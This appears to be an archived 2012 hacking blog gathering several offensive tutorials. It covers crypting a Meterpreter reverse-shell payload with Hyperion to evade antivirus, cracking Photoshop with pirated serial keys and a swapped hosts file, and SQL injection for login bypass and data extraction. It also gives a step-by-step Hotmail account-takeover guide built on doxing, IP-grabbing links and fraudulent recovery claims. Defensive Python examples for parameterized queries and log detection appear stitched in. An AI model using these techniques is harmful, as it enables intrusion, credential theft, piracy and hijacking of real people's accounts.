Thursday 15 November 2012

Bypassing Antivirus with PE Crypters by Shubham Mittal (@k@ Upgoingstaar)

Well, most of the time when we do a penetration test, we are facing a super cool AV product which stops us from executing our lovely EXEs, shellcode, etc.

I was looking around for a way past this, and from a presentation by Mr. Dave Kennedy at DerbyCon I got something quite useful. He used some terms like "shellcodexec" and "PE crypters". On digging here and there, I found that shellcodexec is a small utility to inject shellcode into any process and thus execute your malicious intentions. The approach is that when there is no file at all, what signature will the AV match? However, shellcodexec is itself getting caught nowadays, and therefore I will not suggest you go for it.

On the other hand, the PE Crypter (from the Nullsecurity team) will encrypt a binary file with a sexy crypting approach and thus can be used to bypass the AV. The whole project runs under the name Hyperion and is a proper working way to mess around with AVs. So let's start.

There has been a lot of work on the AV side: the templates with which we encrypt our EXE, and the decryption routine the program uses to reach the actual offset, both get signatured, with "Detection" as the result. In this PE crypter the payload is not scrambled; instead it is encapsulated. A different key is used as the cipher every time, and at execution time it is brute forced. So it will take time, huh? Well, yeah, it will take time if our key is long, so we keep our key short and everything goes fine. That, in short, is what the Hyperion PE crypter does: a weak 128-bit AES key is used to encapsulate the packet and is simply brute forced at execution time. If you want to give it a hardcore look, check out this research paper (http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf).

Anyway, for the super cool guys, this was enough. But as only the source files are available by now, for those who are new to these things it can be a little troublesome :P. So let me give you a walkthrough. First of all, choose your platform; I'm preferring Linux all the way, but it's your system, and your choice too.

Next, download the project, or use:
wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
Unzip it.

unzip Hyperion-1.0.zip
Change into the extracted directory and compile it with the MinGW g++ under Wine (the original post had a trailing ".zip" on the cd target, which would point at the archive rather than the directory):

cd Hyperion-1.0

wine /root/drive_c/MinGW/bin/g++ Src/Crypter/*.cpp -o shubham.exe

Once you have created the crypter executable, shubham.exe in this case, you can start playing around with EXEs. I am creating an msfpayload for a reverse connection; once it is crypted using Hyperion, it should bypass the AV while still sending back the reverse connection.

Create the payload.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe
Scan it. 
Once the payload is ready, we will scan it first (without crypting).
Let's crypt it with Hyperion.

wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe

ls -l

Scan it.
No detection.

Execute it.
As soon as you execute it, it will start brute forcing, which pushes CPU usage to 100%.

Enjoy it.
As soon as the brute force finishes, CPU usage drops back to normal and a session is generated.

I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.

Stay Focused; & Keep exploiting. :)

MSF not updating : Working Copy '.' Locked. Suggestion for SVN

Welcome Friends, I Am Posting A New Tutorial by Shubham Mittal (@k@ upgoingstaar) and his Blog (Must read):
http://3ncrypt0r.blogspot.in/
So Get Ready To Be A G33k With Him. Enjoy The Tutorial...


Most of the time, when we come across some new exploits in the market and expect them in our msf instance, the framework gets stuck at some point while updating and you have a reason for your disappointment. You try some Googling, but it doesn't help, as most of the people on those forums, instead of answering, are fighting, arguing and posting lame things.

To solve this for newbies, I am therefore writing this article; however, if you enjoy digging into things on your own (which is the best practice to make you strong conceptually; I learnt this from a highly experienced senior), this is not for you.

There can be a lot of reasons for not being able to update msf. One of them I covered in my last post,

http://3ncrypt0r.blogspot.in/2012/08/msfupdate-not-working-solution.html

The other one I am covering today.

Generally, when we update, we have to sit through it for a long time because the update gets stuck and comes back with an error that looks something like this when you run msfupdate:

svn : Working copy '.' locked
svn : run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)

Reason: SVN not being able to handle the situation. 

What is SVN? 

SVN is a program which keeps track of all the different versions of our source files. You can give a read to it on this Wiki page.


Solution: 

SVN tries to resolve the issue on its own and suggests you run "cleanup" in the directory which is getting locked. If it works, congratulations. In most cases it will not work and you will see something like this:



In my case I was getting the error in the "/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support" directory.


I guessed it was getting locked on some file within the directory, but as the files don't appear in the folder while it is being synchronized with git, you can't delete that particular file. Better to remove the directory itself. So I deleted that particular directory:




I was a bit unlucky that day, so it didn't solve the situation. But as we must not leave things unsolved, go through the error and try to figure it out. Again it was locked in some other directory:




So without any laziness, delete it too.




As a precaution to avoid further error messages (I HATE ERRORS, seriously), run this:




Most probably you have figured it out, so try msfupdate now.



And perhaps this will give you a smile.




Suggestions and queries are always welcomed.

KEEP EXPLOITING.

Adobe Photoshop CS5 Cracking Tutorial To Show The Importance of Host File in Windows



Thanx For Being Here...
Suppose I'm a web designer and I want to use Photoshop CS5 for giving extreme graphics to my projects or websites. In that case I will use the maximum tools and resources available in Photoshop CS5, but the problem is Photoshop activation and registration...
So, today I am telling you about cracking Adobe Photoshop CS5.


 Step By Step Guide :~#

  • Download  Adobe Photoshop from the official site of Adobe .
  • After installing the trial version, now go to 


C:\WINDOWS\system32\drivers\etc\



  • Then after going there you have to replace the file named "Hosts" with a new hosts file  - Download
  • After you have replaced the file, just open the registration window & enter any of the serial number from below . 


1330-1036-2793-5476-2605-5729
1330-1193-9982-0310-7670-2199
1330-1470-0441-6829-3063-2553
1330-1976-0892-7993-3728-5629
1330-1527-2207-3657-2876-1004
1330-1361-6390-5309-5916-6481
1330-1614-6955-3965-0930-9043


How to make free International calls from Private Number

How Are You Friends...
Today is your another lucky day, coz I'm back with an amazing tutorial about making fake calls...
Yes, we can say a fake call...from an international no.

Follow My Steps as you always Do :D
Step 1 & last.
Go to www.evaphone.com and create an account, and they will offer you a free call with a private number.
 

Sql Injection Part 1 Hacking Admin Panels Using sql Authentication bypass


Welcome To All Readers Of The Mindbenders
SQL Injection

SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web application.


SQL Injection - 1 Authentication Bypass
Before we jump to the main topic, some basics…
SQL : Structured Query Language
It is meant for the communication between the application and the database.

select : used to select (read) data.
insert : used to insert data.
update : used to update data.
delete : used to delete data.

Some basic queries with examples
select * from <table name>;
> select * from news;
select <column name> from <table name>;
> select news_title from news;
select <col1>, <col2> from <table name>;
> select news_content,news_title from news;
select <col1>, <col2> from <table name> where <col>=<val>;
> select news_content,news_title from news where ID=3;
select * from user_login where uid='<value>' and pass='<value2>';
> select * from user_login where uid='name' and pass='password';
> select * from admin where admin_id='admin' and pass='admin';
Now, instead of the password text, we can enter this string for authentication bypass:
'or'0'='0

The query structure will become
select * from admin where admin_id='admin' and pass=''or'0'='0';
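To make the bypass above concrete from the defender's side, here is an added Python example (not from the original post) that runs the page's `'or'0'='0` string against two login functions over a constructed in-memory SQLite `admin` table with a single row: one that builds the query by string concatenation exactly as the page shows, and one that uses bound parameters. The table, row values and function names are constructed for this example.

```python
import sqlite3

# Constructed sample database: one admin row, mirroring the page's
# "select * from admin where admin_id='admin' and pass='admin'" example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (admin_id TEXT, pass TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'admin')")
    return conn

def login_vulnerable(conn, admin_id, pw):
    # Query built by string concatenation: the user-supplied text becomes
    # part of the SQL grammar, so a quote in the input rewrites the logic.
    sql = ("select * from admin where admin_id='" + admin_id +
           "' and pass='" + pw + "'")
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, admin_id, pw):
    # Placeholders: the driver passes the values separately from the SQL
    # text, so the input is only ever compared as data, never parsed.
    sql = "select * from admin where admin_id=? and pass=?"
    return conn.execute(sql, (admin_id, pw)).fetchone() is not None

def demo():
    conn = make_db()
    bypass = "'or'0'='0"    # the page's bypass string, entered as the password
    return {
        "vuln_correct":  login_vulnerable(conn, "admin", "admin"),
        "vuln_wrong":    login_vulnerable(conn, "admin", "wrong"),
        "vuln_bypass":   login_vulnerable(conn, "admin", bypass),   # True: logged in without the password
        "param_correct": login_parameterized(conn, "admin", "admin"),
        "param_bypass":  login_parameterized(conn, "admin", bypass), # False: string compared literally
    }

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:14s} -> {'login OK' if ok else 'rejected'}")
```

With the concatenated query, the resulting SQL is `... and pass=''or'0'='0'`; `AND` binds tighter than `OR`, so the `'0'='0'` branch makes the whole `WHERE` clause true and the admin row comes back. With placeholders the same string is just a nine-character password that matches nothing.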

Admin Pages can be somewhat like this,

/admin
/admin.asp
/admin.aspx
/admin.php
/administrator
/administrator.asp
/administrator.aspx
/administrator.php
/user
/user.php
/user.asp
/user.aspx
/login
/login.asp
/login.aspx
/login.php
/Admin
/Admin.asp
/Admin.aspx
/Admin.php
/Administrator
/Administrator.asp
/Administrator.aspx
/Administrator.php
/userlogin
/userlogin.asp
/userlogin.aspx
/userlogin.php
/Adminlogin
/Adminlogin.asp
/Adminlogin.aspx
/Adminlogin.php
/AdminLogin
/AdminLogin.asp
/AdminLogin.aspx
/AdminLogin.php
/newuser
/newuser.asp
/newuser.aspx
/newuser.php
/Newuser
/Newuser.asp
/Newuser.aspx
/Newuser.php
/NewUser
/cms

SQL Injection - 2 Union Based Injection

Again Some Basics,
order by : is used for the sorting purpose.

union : is used to select all the data, but it won't repeat the same data.
a = {1,2,3,4}
b = {1,2,3,4,5,6,7}
a U b = {1,2,3,4,5,6,7}

database: is a group of tables.

table : is a group of columns & rows.

column & row : will store the data.

Information Schema: information_schema is the information database, the place
that stores information about all the other databases that the MySQL server
maintains. We can access the information by using its objects, the tables and columns views.

information_schema.tables: contains all the information about the tables.

information_schema.columns: contains all the information about the columns.

i.e.: db1 (can provide information only about its own database.)
      db2 (can provide information only about its own database.)
      db3 (can provide information only about its own database.)
But
information_schema will be storing info about all of db1, db2, db3.

table_name: is used to represent the name of the tables.

column_name: is used to represent the name of the columns.

version(): to see the database version

user(): to see the default user of the database

database(): to see the name of the database

concat() , group_concat(): used for the concatenation purpose.

Step:1 find something=something
           i.e. : id=2, catid=5, prod=savita
           www.site.com/page.php?id=1
           apply '
           if it is generating any error, blank page, data missing
           > good news for us !!!
           > website may be vulnerable.

Step:2 To see the number of columns which are displaying the data.
[ Remove ' ]
note: whatever data we see on the page must be fetched from some database ->
tables -> columns
> and not only 1 column but more than 1 column from different tables must be
displaying the data.
i.e. : www.site.com/page.php?id=1 order by 1 -- || n
        www.site.com/page.php?id=1 order by 2 -- || n
        www.site.com/page.php?id=1 order by 3 -- || n
        www.site.com/page.php?id=1 order by 4 -- || n
        www.site.com/page.php?id=1 order by 9 -- || n
        www.site.com/page.php?id=1 order by 10 -- || Error
(n = the page loads normally)

so there are 9 columns which are fetching the data.

Step: 3 To see the visible column
union select will be used.
union select 1,2,3,4,5,6,7,8,9 --
i.e.:    www.site.com/page.php?id=1 union select 1,2,3,4,5,6,7,8,9 --
to avoid the default data
          www.site.com/page.php?id=-1 union select 1,2,3,4,5,6,7,8,9 --

step: 4 Get the table names
i.e. :      www.site.com/page.php?id=-1 union select 1,table_name,3,4,5,6,7,8,9 from
information_schema.tables --

Admin

Step:5 Get the column names
i.e. :     www.site.com/page.php?id=-1 union select 1,column_name,3,4,5,6,7,8,9 from
information_schema.columns where table_name='admin' --

username
password

Step:6 Get the data.
i.e.:      www.site.com/page.php?id=-1 union select 1,password,3,4,5,6,7,8,9 from
admin --

username : admin
password : adminpass

Sometimes, while fetching the columns we may face some error, so we need to
convert table name(string) to ascii.
use: http://easycalculation.com/ascii-hex.php
string: admin
Equivalent Ascii Value : char(97,100,109,105,110)

Sometimes, while fetching the table names, we may see only one table name,
to fetch all the tables we have to use
group_concat(table_name)

sometimes, we may face a situation to count the number of tables, so
count(table_name)

Sometimes, we may need to fetch the name of the tables within the viewsize of the
page.
limit 0,1 -- to see the 1st table name

Sometimes, we need to see username and password all together,
group_concat(user,0x3a,pass) || user:pass
HackBar: a Firefox add-on that makes editing these URLs easier.

SQL Injection - 3 Error Based Injection

Step: 1 find something=something
i.e.: id=3, catid=3, uid=3 etc etc etc
and apply '

Step: 2 http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
table_name from information_schema.tables)) --

Let's understand the query.
and 1=convert(int,(select top 1 table_name from information_schema.tables)) --

from this, you have already understood
select top 1 table_name from information_schema.tables

but only top 1 is unfamiliar to you: top 1 points to the 1st table name
from information_schema.tables

Let's assume that the one name we got is "ABCD"
and 1=convert(int,(ABCD)) --

It will try to convert ABCD to the integer. String to Integer conversion is not
possible directly so it will definitely generate an error.

The error will be containing the name of a table.
So, we have got the one table, if we want to fetch the 2nd table then we may need
to
http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1 table_name
from information_schema.tables where table_name not in('ErrorTable'))) --

this will display you the 2nd table; to see more tables, you can put the names of the
tables in not in('ErrorTable1','ErrorTable2')

Step: 3 http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='ErrorTable'))
--

Now if we want to fetch the 2nd column name then, the query would be somewhat
like,

http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='ErrorTable'
and column_name not in('ErrorColumn1'))) --

http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='ErrorTable'
and column_name not in('ErrorColumn1','ErrorColumn2'))) --

After finding the table name and the column name we can fetch the data.


Step: 4 http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
ErrorColumnName from ErrorTableName)) --
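Seen from the web server's side, the union-based walkthrough (SQL Injection - 2) and the error-based one (SQL Injection - 3) leave a recognisable trail in the access log: a lone quote probe, `order by N` column counting, `union select` against `information_schema`, and on MSSQL the `convert(int,...)` error trick. The following Python is an added example, not part of the original post, that decodes the request target from constructed Apache-style access-log lines and tags each one with the indicators it contains. The log lines, IP addresses and indicator names are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Indicators drawn from the probes the two sections walk through.
# Constructed list, not exhaustive: encoded or comment-obfuscated
# variants need further normalisation before these patterns fire.
INDICATORS = [
    ("quote-probe",    re.compile(r"=[^&]*'(\s|$|--|&)")),
    ("order-by-count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select",   re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enum",    re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("mssql-convert",  re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),
    ("group-concat",   re.compile(r"\bgroup_concat\s*\(", re.I)),
]

# Common log format: client, ident, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Constructed sample log, following the page's own URL shapes.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Nov/2012:10:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [14/Nov/2012:10:00:02 +0000] "GET /page.php?id=1%27 HTTP/1.1" 500 120',
    '10.0.0.5 - - [14/Nov/2012:10:00:03 +0000] "GET /page.php?id=1%20order%20by%2010%20-- HTTP/1.1" 500 120',
    '10.0.0.5 - - [14/Nov/2012:10:00:04 +0000] "GET /page.php?id=-1%20union%20select%201,table_name,3%20from%20information_schema.tables%20-- HTTP/1.1" 200 640',
    '10.0.0.7 - - [14/Nov/2012:10:00:05 +0000] "GET /page.aspx?id=1%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))%20-- HTTP/1.1" 500 300',
    '10.0.0.9 - - [14/Nov/2012:10:00:06 +0000] "GET /news.php?id=3 HTTP/1.1" 200 900',
]

def classify(request_target):
    """Return the indicator names found in one request target."""
    # Decode percent-encoding (and '+' to space) once before matching,
    # so an encoded payload does not slip past the patterns.
    decoded = unquote_plus(request_target)
    return [name for name, rx in INDICATORS if rx.search(decoded)]

def scan(lines):
    """Return (client_ip, target, tags) for every line carrying an indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue            # not a request line we understand; skip it
        ip, _ts, target, _status = m.groups()
        tags = classify(target)
        if tags:
            hits.append((ip, target, tags))
    return hits

def by_source(hits):
    """Count flagged requests per client, which is what an analyst pivots on."""
    counts = {}
    for ip, _target, _tags in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, target, tags in found:
        print(ip, ",".join(tags), target)
    print(by_source(found))
```

The sequence from one client (quote probe, then `order by`, then `union select` with `information_schema`) is more telling than any single hit, which is why `by_source` groups by client. Treat this as triage, not a filter: the page itself notes that names may be sent as `char(...)` values, and `/*...*/` or case tricks will dodge these plain patterns.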


Wednesday 14 November 2012

Hack Almost any Hotmail account without keylogger , Phishing in 24 hours


Welcome To All, I see a lot of new members joining, and wanting to learn how to hack somebody's hotmail account..or asking others to do it for them.
Most are under the illusion that there's this "hack" button you can press and you instantly get their password, however this is not the case.
Most newbs are put off by the fact that they have to keylog or phish their way into getting a password, and they resort to asking the "hackers".
But I'll provide an easy alternative.

This method is called Reverting, and you will be sending a form in to Microsoft customer support to reset the password for your (or somebody else's) hotmail account.

NOTE: If you are interested in protecting yourself against this hacking method, please refer to this Blog.

For this method, it helps to know the person, even a little, but I'll still give you a step-by-step tut on how to find the information and fill out each part of the form.

NOTE: THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY, I AM NOT RESPONSIBLE IN ANY WAY FOR HOW THIS INFORMATION IS USED, YOU USE IT AT YOUR OWN RISK. YOU MAY LEARN ALSO HOW TO GET YOUR OWN ACCOUNT BACK FROM THIS.

Step 1: go here:

https://support.live.com/eform.aspx?prod...mcs&scrx=1

Step 2: Give them your victims full name.

Now, if you do not know their first name, try the following things to find it.

First, try using these two sites, simply enter their email and hit return.

http://www.pipl.com/email
http://com.lullar.com

if you want more, google their hotmail account(s), for example, type into google:

"victimshotmail@hotmail.com"

Include the quotes, because this searches for only the hotmail account.
If you gain any results, it will most likely be forums or, if you're lucky, social networking sites that they have filled out their info on.
Go through these searches, and look at every one, even make a .txt file in notepad pasting down all the info you can on them.
Once you're done, if you haven't got their last name, keep reading..if you have, go to step 3.

Presuming you don't yet have their last name, try going to social networking sites, like:
http://www.myspace.com
http://www.facebook.com
http://www.bebo.com
http://www.friendster.com

Or any others you can think of, and search for their hotmail account using the websites search feature.
if you get any results, you're in luck, most of the time people include a lot of information on themselves in there. Follow any leads you can find on the info, and even ask them or their friends (look up a tutorial on social engineering info out of people first, it will help).

Now another thing you can do is use http://www.whois.com IF your slave has their own website.

If you don't have it by now, maybe you should find an easier target, or if you're desperate, use this technique to hack one of their rl best friends, and a lot of the time they have their full name assigned to your victim's hotmail address, in their addressbook.

Or, I sometimes just say "I'm pretty sure I only put in my first name at registration, I'm paranoid like that" or something along those lines... It's worked for me.

BTW: This is called d0xing, or "documenting", basically harvesting info on people, it's completely legal as long as you get all your info from the public domain (forums, social networking sites etc).

Step 3: The e-mail address for us to send a response:
Simple, give them your email address... could use a fake one if you're paranoid (one you've got access to), but I don't see any risk.

Step 4: Primary e-mail address/member ID associated with the account you are inquiring about:
Here you put in your victims email address (the one you're trying to hack). Then click Continue.

Step 5: Date of birth.
You can simply give them the year, if you don't know any further than that..but if you want to be on the safe side, read step 2, and use those techniques to find their date of birth.

Step 6: Country
If you don't know their country, which you probably should, use their IP address, which you will have in one of the next steps, to find it, by using
http://www.ip-adress.com/ip_tracer/

Step 7: State
same deal, use their IP addy if you don't know it already

Step 8: ZIP or postal code
Same deal again, it's usually correct if you use the IP addy...just use http://www.ip-adress.com/ip_tracer/
and find their town/suburb or whatever, and google the ZIP code for it.

Step 9: The secret answer to your question
simply put "i don't remember"

Step 10: Your alternate email address
for this, you just put in the email address you're trying to hack, you don't need their alternate email address.

Step 11: Your IP Address
Okay so here's probably the toughest one, but it's still easy. (NOTE: It's very hard to revert an account unless you successfully complete this step)
There's a lot of ways to get their IP, I'll give you the easy ones.

Email: Get them to send you an email somehow, it doesn't matter how, you can just send an email saying:
"hey, how are you?" and they'll probably reply. Once you have their email (don't use old emails, please, everybody uses dynamic IPs these days)
right click on it, and click "view source", you will see something like this:

...now you want to find "X-Originating-IP: [XX.XXX.XX.XX]" That is their IP address. If the email source is all gibberish and looks encrypted, try what one user suggested:

(09-24-2010 07:59 AM)TOMMIE Wrote: 
This is from Hotmail? Right? I get this too..
I forwarded these emails to my broadband providers base email (NOT Webmail), then selected each one and `Save as`, it will prompt you to save in .eml format - save to desktop, then right-click and open in Notepad. You will see detail then.
hth

Website: Go here http://www.syntaxmaster.info and register an account for free, it's real easy.

Now once you're registered, go to Software/Tools > IP Stealer; and then you can type in the URL you want your IP stealer to redirect to.. so just google or myspace or something will do. Now you'll see above that they give you your URL, you just send them there and it'll grab their IP, redirect them to google (or whatever site you choose), and then show their IP down at the bottom of the page.

I suggest using spam or http://www.doiop.com/ to shorten your URL and make it custom, you could make it something like:

http://www.doiop.com/profile-329479

And voila, it'll look like a social networking site "Hey, I'm katie. :) I'm looking to meet new people and was wondering if you wanted to be friends? ^_^ This is my profile btw: <give fake link>"

Something like that. :p

MSN: if you can talk to them on msn, then you can get their IP that way too..there's two ways, either download an easy-to-use script, or do it manually with cmd,
I'll show you how to do it manually first.

Manually: Send them a file, or get them to send you a file.
"hey, i love that song, can you send me it?" or "omg, this is the funniest picture ever".
Before you start the transfer though, go to start > run (if you're using vista, just press the windows key) and type in cmd, and hit enter.

type in the following: netstat -n

and hit enter, it will show you a list of active connections to different IP's.

Remember or take a screenshot of those IPs, because once you start the transfer, type in netstat again while it's transferring and check for any new IPs, that is your victim's IP.

With a script:
IF you have windows live messenger plus (probably the best WLM IMO), download this script:
http://rapidshare.com/files/133356881/IPGet_1.50.rar
It's called IP-Get, and will show you your current msn contacts' IP addresses IF you're currently connected to them with a fileshare. It will also allow you to save the IP addresses, and look up their locations.

Here is a screenie of IP-get:


There are other ways, but surely you should have been able to get their IP by now...if not, look up a tut on it, using the search feature.

Step 12: Your internet service provider
very easy to find, use their IP, either using the IP get script if you have it, or http://www.ip-adress.com/ip_tracer/

Step 13: The last date and time that you successfully signed in
Unless you know this as a fact, either take your best guess, say you don't remember, or yesterday.

Step 14: The names of any folders that you created in addition to the default folders
leave this blank, or say you don't know (unless you know this for a fact).

Step 15: Names of contacts in your hotmail address book
give them all the contacts you know are definitely or most likely in there, including yourself, and even their other accounts (they might add themselves, everybody seems to). Also give them wilma@live.com and smarterchild@hotmail.com, as most people have them added.

Step 16: Subjects of any old mail that is in your inbox
okay just use common sense for this one, things to include are:
hey, how are you, RE:, FW:, admin, windows live, hotmail staff, recovery, registration, support, lol, password, confirmation, noreply, delivery status notification (failure).

Also, if they are subscribed to any forums (like hackforums (but please don't hack other members :p)), social networking sites (like myspace, bebo) or online games (like RuneScape, WoW), then be sure to include them too.

Step 17: Names of contacts on your messenger contact list
If you happen to know any of their friends, this is where you put their display name...if you don't have them added, put their first names, and if you don't know them at all, just leave it blank, or say you don't remember.

Step 18: Your Messenger nickname
If you know it, put it in..if you don't, say "i can't remember it exactly" or leave it blank.

Step 19:
The rest you don't really need to worry about, except for in additional info, where you can put anything else that might make you sound more convincing..like:

"please do your best to recover my account, i dont want to go and have to add all my friends again, it'd be a great help if you got it back for me, thank you in advance."

obviously don't put exactly that, but you get the gist of it :)

Okay, I believe that is it, within 24 hours you will receive an email from customer support, they will either give you a link to reset your (victim's) password, or ask you to send it again with more info, as an email reply..and in that case, you don't have much luck, cause they can just get your IP address from the email and know you're lying :) so try again, and hope you get a more gullible staff member. If you have firefox, 

I did give you a link to download earlier, here is a virus scan for you guys who aren't sure.

Quote:
File Info

Report generated: 1.7.2009 at 14.45.40 (GMT 1)
Filename: IPGet_1.50.plsc
File size: 721 KB
MD5 Hash: 081f4ed7f145689e1911b16fc49fa4b4
SHA1 Hash: 3B9348B972ACA7006F9E38951EE76AB632F54EF0
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 24

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
Malware Hash Registry - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -

Scan report generated by
NoVirusThanks.org

If you have any questions, ask here,  I didn't rip any of this from other tuts, typed it up myself. Thanks for reading, I know it's long, I've reached the max character limit